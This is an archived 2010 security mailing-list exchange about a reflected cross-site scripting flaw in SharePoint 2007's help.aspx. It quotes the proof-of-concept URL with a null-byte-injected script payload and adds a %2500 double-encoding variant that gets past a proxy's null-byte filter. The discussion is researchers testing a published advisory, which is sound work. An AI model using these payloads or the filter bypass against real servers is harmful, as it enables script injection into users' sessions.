From: NeZa (neza0xgmail.com)
Date: Fri Apr 30 2010 - 09:57:44 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

My proxy filters out Null byte chars, however due to SharePoint decoding
design, that helped to bypass my Proxy by injecting the well known variant
%2500, so below string also works:

http://wss1-ch-bfr/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%2500%3Cscript%3Ealert%28%27VivaMexico!!%27%29%3C/script%3E&tid=X

My 2 pesos!

On Thu, Apr 29, 2010 at 2:48 PM, dave <daveimmunityinc.com> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint
> is one of
> the single largest data security risks in most large Enterprises and
> everyone pretty
> much ignores it, which is always funny. :>
>
>
> http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html
>
> This is the string that's supposed to work. Someone try it and let us all
> know! :>
>
>
> http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
>
> - -dave
> (Note: I'm recovering from an illness - your emails will be answered in the
> order
> they were received!)
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org
>
> iEYEARECAAYFAkvZ4psACgkQtehAhL0ghep4lQCcDY4wc2y9Icx/1oyd+oFgNMun
> VPwAnAnc4dDlUFXVyS3NtsKHdkyG/Q73
> =eAv+
> -----END PGP SIGNATURE-----
> _______________________________________________
> Dailydave mailing list
> Dailydavelists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

--
Daniel Regalado
NeZa Rifa!!!

_______________________________________________
Dailydave mailing list
Dailydavelists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]